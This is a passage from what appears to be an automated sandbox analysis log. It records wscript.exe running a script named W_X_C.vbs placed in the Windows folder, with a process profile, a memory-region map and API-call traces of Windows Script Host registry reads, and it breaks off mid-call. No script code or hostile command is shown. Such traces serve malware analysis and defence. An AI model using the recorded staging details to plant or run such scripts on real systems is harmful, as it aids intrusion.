(hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b4e18) returned 1 [0176.487] GetProcessHeap () returned 0x4a0000 [0176.487] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b4e18) returned 0x14 [0176.488] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b4e78) returned 1 [0176.488] GetProcessHeap () returned 0x4a0000 [0176.488] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b4e78) returned 0x14 [0176.488] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4af0a8) returned 1 [0176.488] GetProcessHeap () returned 0x4a0000 [0176.488] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4af0a8) returned 0x10 [0176.488] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b4e98) returned 1 [0176.488] GetProcessHeap () returned 0x4a0000 [0176.488] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b4e98) returned 0x14 [0176.488] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4af060) returned 1 [0176.488] GetProcessHeap () returned 0x4a0000 [0176.488] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4af060) returned 0x10 Process: id = "13" image_name = "wscript.exe" filename = "c:\\windows\\syswow64\\wscript.exe" page_root = "0x28227000" os_pid = "0xd04" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "10" os_parent_pid = "0xb7c" cmd_line = "\"C:\\Windows\\System32\\WScript.exe\" \"C:\\Windows\\W_X_C.vbs\" " cur_dir = "C:\\Users\\kEecfMwgj\\Desktop\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f0ba" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1910 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1911 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1912 start_va = 0x40000 end_va = 0x40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1913 start_va = 0x50000 end_va = 0x53fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 1914 start_va = 0x1b0000 end_va = 0x1effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 1915 start_va = 0x200000 end_va = 0x2fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 1916 start_va = 0xfc0000 end_va = 0xfe5fff monitored = 1 entry_point = 0xfc2f3b region_type = mapped_file name = "wscript.exe" filename = "\\Windows\\SysWOW64\\wscript.exe" (normalized: "c:\\windows\\syswow64\\wscript.exe") Region: id = 1917 start_va = 0x77880000 end_va = 0x77a28fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1918 start_va = 0x77a60000 end_va = 0x77bdffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1919 start_va = 0x7efb0000 end_va = 0x7efd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 1920 start_va = 0x7efdb000 end_va = 0x7efddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 1921 start_va = 0x7efde000 end_va = 0x7efdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 1922 start_va = 0x7efdf000 end_va = 0x7efdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 1923 start_va = 0x7efe0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 1924 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1925 start_va = 0x7fff0000 end_va = 0x7fffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1926 start_va = 0xd0000 end_va = 0x14ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 1927 start_va = 0x752e0000 end_va = 0x752e7fff monitored = 0 entry_point = 0x752e20f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1928 start_va = 0x752f0000 end_va = 0x7534bfff monitored = 0 entry_point = 0x7532f9f4 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1929 start_va = 0x75350000 end_va = 0x7538efff monitored = 0 entry_point = 0x7537e088 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1930 start_va = 0x77660000 end_va = 0x7777efff monitored = 0 entry_point = 0x77675340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1931 start_va = 0x75a80000 end_va = 0x75b8ffff monitored = 0 entry_point = 0x75a93283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1932 start_va = 0x77660000 end_va = 0x7777efff monitored = 0 entry_point = 0x77675340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1933 start_va = 0x77660000 end_va = 0x7777efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000077660000" filename = "" Region: id = 1934 start_va = 0x77780000 end_va = 0x77879fff monitored = 0 entry_point = 0x7779a2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1935 start_va = 0x77780000 end_va = 0x77879fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000077780000" filename = "" Region: id = 1936 start_va = 0x300000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 1943 start_va = 0x75a80000 end_va = 0x75b8ffff monitored = 0 entry_point = 0x75a93283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1944 start_va = 0x77240000 end_va = 0x77286fff monitored = 0 entry_point = 0x772474c1 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1945 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1946 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 1947 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 1948 start_va = 0x60000 end_va = 0xc6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1949 start_va = 0x76f40000 end_va = 0x76fdffff monitored = 0 entry_point = 0x76f549e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 1950 start_va = 0x76dc0000 end_va = 0x76e6bfff monitored = 0 entry_point = 0x76dca472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1951 start_va = 0x75960000 end_va = 0x75978fff monitored = 0 entry_point = 0x75964975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1952 start_va = 0x774e0000 end_va = 0x775cffff monitored = 0 entry_point = 0x774f0569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1953 start_va = 0x755b0000 end_va = 0x7560ffff monitored = 0 entry_point = 0x755ca3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1954 start_va = 0x755a0000 end_va = 0x755abfff monitored = 0 entry_point = 0x755a10e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1955 start_va = 0x75980000 end_va = 0x75a7ffff monitored = 0 entry_point = 0x7599b6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 1956 start_va = 0x771b0000 end_va = 0x7723ffff monitored = 0 entry_point = 0x771c6343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 1957 start_va = 0x75820000 end_va = 0x75829fff monitored = 0 entry_point = 0x758236a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 1958 start_va = 0x75bc0000 end_va = 0x75c5cfff monitored = 0 entry_point = 0x75bf3fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 1959 start_va = 0x775d0000 end_va = 0x7765efff monitored = 0 entry_point = 0x775d3fb1 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 1960 start_va = 0x76c60000 end_va = 0x76dbbfff monitored = 0 entry_point = 0x76caba3d region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 1961 start_va = 0x745b0000 end_va = 0x745b8fff monitored = 0 entry_point = 0x745b1220 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 1962 start_va = 0x470000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 1963 start_va = 0x20000 end_va = 0x3dfff monitored = 0 entry_point = 0x3158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1964 start_va = 0x4f0000 end_va = 0x677fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004f0000" filename = "" Region: id = 1965 start_va = 0x20000 end_va = 0x3dfff monitored = 0 entry_point = 0x3158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1966 start_va = 0x76920000 end_va = 0x7697ffff monitored = 0 entry_point = 0x7693158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1967 start_va = 0x76e70000 end_va = 0x76f3bfff monitored = 0 entry_point = 0x76e7168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 1968 start_va = 0x680000 end_va = 0x800fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000680000" filename = "" Region: id = 1969 start_va = 0xff0000 end_va = 0x23effff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ff0000" filename = "" Region: id = 1970 start_va = 0x20000 end_va = 0x22fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wscript.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\wscript.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\wscript.exe.mui") Region: id = 1971 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1972 start_va = 0x150000 end_va = 0x150fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 1973 start_va = 0x744d0000 end_va = 0x7454ffff monitored = 0 entry_point = 0x744e37c9 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 1974 start_va = 0x810000 end_va = 0x9dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000810000" filename = "" Region: id = 1980 start_va = 0x810000 end_va = 0x8eefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000810000" filename = "" Region: id = 1981 start_va = 0x9a0000 end_va = 0x9dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009a0000" filename = "" Region: id = 1982 start_va = 0xa20000 end_va = 0xa5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a20000" filename = "" Region: id = 1983 start_va = 0xb40000 end_va = 0xc3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000b40000" filename = "" Region: id = 1984 start_va = 0x7efd8000 end_va = 0x7efdafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efd8000" filename = "" Region: id = 2000 start_va = 0xc40000 end_va = 0xf0efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2001 start_va = 0x160000 end_va = 0x16efff monitored = 1 entry_point = 0x162f3b region_type = mapped_file name = "wscript.exe" filename = "\\Windows\\SysWOW64\\wscript.exe" (normalized: "c:\\windows\\syswow64\\wscript.exe") Region: id = 2002 start_va = 0x72ec0000 end_va = 0x72f1efff monitored = 0 entry_point = 0x72ec2134 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\SysWOW64\\sxs.dll" (normalized: "c:\\windows\\syswow64\\sxs.dll") Region: id = 2016 start_va = 0x480000 end_va = 0x4bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 2017 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 2018 start_va = 0x2590000 end_va = 0x268ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002590000" filename = "" Region: id = 2019 start_va = 0x7efd5000 end_va = 0x7efd7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efd5000" filename = "" Region: id = 2020 start_va = 0x74490000 end_va = 0x744a2fff monitored = 0 entry_point = 0x74491d3f region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 2021 start_va = 0x170000 end_va = 0x170fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000170000" filename = "" Region: id = 2022 start_va = 0x77450000 end_va = 0x774d2fff monitored = 0 entry_point = 0x774523d2 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 2023 start_va = 0x180000 end_va = 0x180fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000180000" filename = "" Region: id = 2024 start_va = 0x713a0000 end_va = 0x7140afff monitored = 1 entry_point = 0x713a1409 region_type = mapped_file name = "vbscript.dll" filename = "\\Windows\\SysWOW64\\vbscript.dll" (normalized: "c:\\windows\\syswow64\\vbscript.dll") Region: id = 2025 start_va = 0x190000 end_va = 0x190fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "w_x_c.vbs" filename = "\\Windows\\W_X_C.vbs" (normalized: "c:\\windows\\w_x_c.vbs") Region: id = 2026 start_va = 0x75b90000 end_va = 0x75bbefff monitored = 0 entry_point = 0x75b92a35 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\SysWOW64\\wintrust.dll" (normalized: "c:\\windows\\syswow64\\wintrust.dll") Region: id = 2027 start_va = 0x75830000 end_va = 0x75950fff monitored = 0 entry_point = 0x7583158e region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 2028 start_va = 0x773f0000 end_va = 0x773fbfff monitored = 0 entry_point = 0x773f238e region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll") Region: id = 2029 start_va = 0x74380000 end_va = 0x74396fff monitored = 0 entry_point = 0x74383573 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 2030 start_va = 0x300000 end_va = 0x33bfff monitored = 0 entry_point = 0x30128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 2031 start_va = 0x370000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 2032 start_va = 0x300000 end_va = 0x33bfff monitored = 0 entry_point = 0x30128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 2033 start_va = 0x300000 end_va = 0x33bfff monitored = 0 entry_point = 0x30128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 2034 start_va = 0x300000 end_va = 0x33bfff monitored = 0 entry_point = 0x30128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 2035 start_va = 0x300000 end_va = 0x33bfff monitored = 0 entry_point = 0x30128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 2036 start_va = 0x74340000 end_va = 0x7437afff monitored = 0 entry_point = 0x7434128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 2037 start_va = 0x190000 end_va = 0x190fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "w_x_c.vbs" filename = "\\Windows\\W_X_C.vbs" (normalized: "c:\\windows\\w_x_c.vbs") Region: id = 2038 start_va = 0xa90000 end_va = 0xacffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a90000" filename = "" Region: id = 2039 start_va = 0x2760000 end_va = 0x285ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002760000" filename = "" Region: id = 2040 start_va = 0x7efad000 end_va = 0x7efaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efad000" filename = "" Region: id = 2044 start_va = 0x753c0000 end_va = 0x753c7fff monitored = 0 entry_point = 0x753c3bf5 region_type = mapped_file name = "msisip.dll" filename = "\\Windows\\SysWOW64\\msisip.dll" (normalized: "c:\\windows\\syswow64\\msisip.dll") Region: id = 2045 start_va = 0x2860000 end_va = 0x2c5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002860000" filename = "" Region: id = 2046 start_va = 0x1a0000 end_va = 0x1a0fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "w_x_c.vbs" filename = "\\Windows\\W_X_C.vbs" (normalized: "c:\\windows\\w_x_c.vbs") Region: id = 2047 start_va = 0x2400000 end_va = 0x243ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002400000" filename = "" Region: id = 2048 start_va = 0x2ca0000 end_va = 0x2d9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002ca0000" filename = "" Region: id = 2049 start_va = 0x72c60000 end_va = 0x72c75fff monitored = 1 entry_point = 0x72c613df region_type = mapped_file name = "wshext.dll" filename = "\\Windows\\SysWOW64\\wshext.dll" (normalized: "c:\\windows\\syswow64\\wshext.dll") Region: id = 2050 start_va = 0x7efaa000 end_va = 0x7efacfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efaa000" filename = "" Region: id = 2051 start_va = 0x75410000 end_va = 0x75493fff monitored = 0 entry_point = 0x754119a9 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll") Region: id = 2052 start_va = 0x75cc0000 end_va = 0x76909fff monitored = 0 entry_point = 0x75d41601 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 2053 start_va = 0x75c60000 end_va = 0x75cb6fff monitored = 0 entry_point = 0x75c79ba6 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 2054 start_va = 0x2da0000 end_va = 0x2f3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002da0000" filename = "" Region: id = 2055 start_va = 0x72c30000 end_va = 0x72c5cfff monitored = 1 entry_point = 0x72c31351 region_type = mapped_file name = "scrobj.dll" filename = "\\Windows\\SysWOW64\\scrobj.dll" (normalized: "c:\\windows\\syswow64\\scrobj.dll") Region: id = 2056 start_va = 0x190000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 2057 start_va = 0x2440000 end_va = 0x253ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002440000" filename = "" Region: id = 2058 start_va = 0x71370000 end_va = 0x71390fff monitored = 1 entry_point = 0x7137e356 region_type = mapped_file name = "wshom.ocx" filename = "\\Windows\\SysWOW64\\wshom.ocx" (normalized: "c:\\windows\\syswow64\\wshom.ocx") Region: id = 2059 start_va = 0x72c10000 end_va = 0x72c21fff monitored = 0 entry_point = 0x72c11200 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\SysWOW64\\mpr.dll" (normalized: "c:\\windows\\syswow64\\mpr.dll") Region: id = 2060 start_va = 0x75390000 end_va = 0x753b9fff monitored = 0 entry_point = 0x753913f2 region_type = mapped_file name = "scrrun.dll" filename = "\\Windows\\SysWOW64\\scrrun.dll" (normalized: "c:\\windows\\syswow64\\scrrun.dll") Region: id = 2061 start_va = 0x1a0000 end_va = 0x1abfff monitored = 1 entry_point = 0x1ae356 region_type = mapped_file name = "wshom.ocx" filename = "\\Windows\\SysWOW64\\wshom.ocx" (normalized: "c:\\windows\\syswow64\\wshom.ocx") Thread: id = 78 os_tid = 0x600 [0173.140] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2ffb00 | out: lpSystemTimeAsFileTime=0x2ffb00*(dwLowDateTime=0x13b82b00, dwHighDateTime=0x1da9885)) [0173.140] GetCurrentProcessId () returned 0xd04 [0173.141] GetCurrentThreadId () returned 0x600 [0173.141] GetTickCount () returned 0x1d132d1 [0173.141] QueryPerformanceCounter (in: lpPerformanceCount=0x2ffaf8 | out: lpPerformanceCount=0x2ffaf8*=3065874817709) returned 1 [0173.141] GetStartupInfoA (in: lpStartupInfo=0x2ffb14 | out: lpStartupInfo=0x2ffb14*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\WScript.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0173.141] GetModuleHandleA (lpModuleName=0x0) returned 0xfc0000 [0173.142] GetModuleHandleA (lpModuleName=0x0) returned 0xfc0000 [0173.142] GetVersionExA (in: lpVersionInformation=0x2ffa24*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x1000000, dwMinorVersion=0x2ff974, dwBuildNumber=0x0, dwPlatformId=0x2ffb94, szCSDVersion="Í\x1e­w\x80õÏ\x01þÿÿÿ£<©wÎ<©wD") | out: lpVersionInformation=0x2ffa24*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0173.142] GetUserDefaultLCID () returned 0x409 [0173.144] CoInitialize (pvReserved=0x0) returned 0x0 [0173.282] GetCommandLineW () returned="\"C:\\Windows\\System32\\WScript.exe\" \"C:\\Windows\\W_X_C.vbs\" " [0173.283] lstrlenW (lpString="\"C:\\Windows\\System32\\WScript.exe\" \"C:\\Windows\\W_X_C.vbs\" ") returned 57 [0173.283] ??2@YAPAXI@Z () returned 0x4e12b0 [0173.283] ??2@YAPAXI@Z () returned 0x4e1330 [0173.283] GetCurrentThreadId () returned 0x600 [0173.283] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ff834 | out: phkResult=0x2ff834*=0xa0) returned 0x0 [0173.284] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ff838 | out: phkResult=0x2ff838*=0xa4) returned 0x0 [0173.284] RegQueryValueExW (in: hKey=0xa4, lpValueName="IgnoreUserSettings", lpReserved=0x0, lpType=0x2febe8, lpData=0x2febec, lpcbData=0x2febe4*=0x400 | out: lpType=0x2febe8*=0x0, lpData=0x2febec*=0x0, lpcbData=0x2febe4*=0x400) returned 0x2 [0173.284] RegQueryValueExW (in: hKey=0xa0, lpValueName="Enabled", lpReserved=0x0, lpType=0x2febe8, lpData=0x2febec, lpcbData=0x2febe4*=0x400 | out: lpType=0x2febe8*=0x0, lpData=0x2febec*=0x0, lpcbData=0x2febe4*=0x400) returned 0x2 [0173.284] RegQueryValueExW (in: hKey=0xa4, lpValueName="Enabled", lpReserved=0x0, lpType=0x2febe8, lpData=0x2febec, lpcbData=0x2febe4*=0x400 | out: lpType=0x2febe8*=0x0, lpData=0x2febec*=0x0, lpcbData=0x2febe4*=0x400) returned 0x2 [0173.285] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x0, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0173.855] RegCloseKey (hKey=0xa4) returned 0x0 [0173.855] RegCloseKey (hKey=0xa0) returned 0x0 [0173.855] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ff604 | out: phkResult=0x2ff604*=0xa0) returned 0x0 [0173.855] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ff600 | out: phkResult=0x2ff600*=0xa4) returned 0x0 [0173.856] RegQueryValueExW (in: hKey=0xa4, 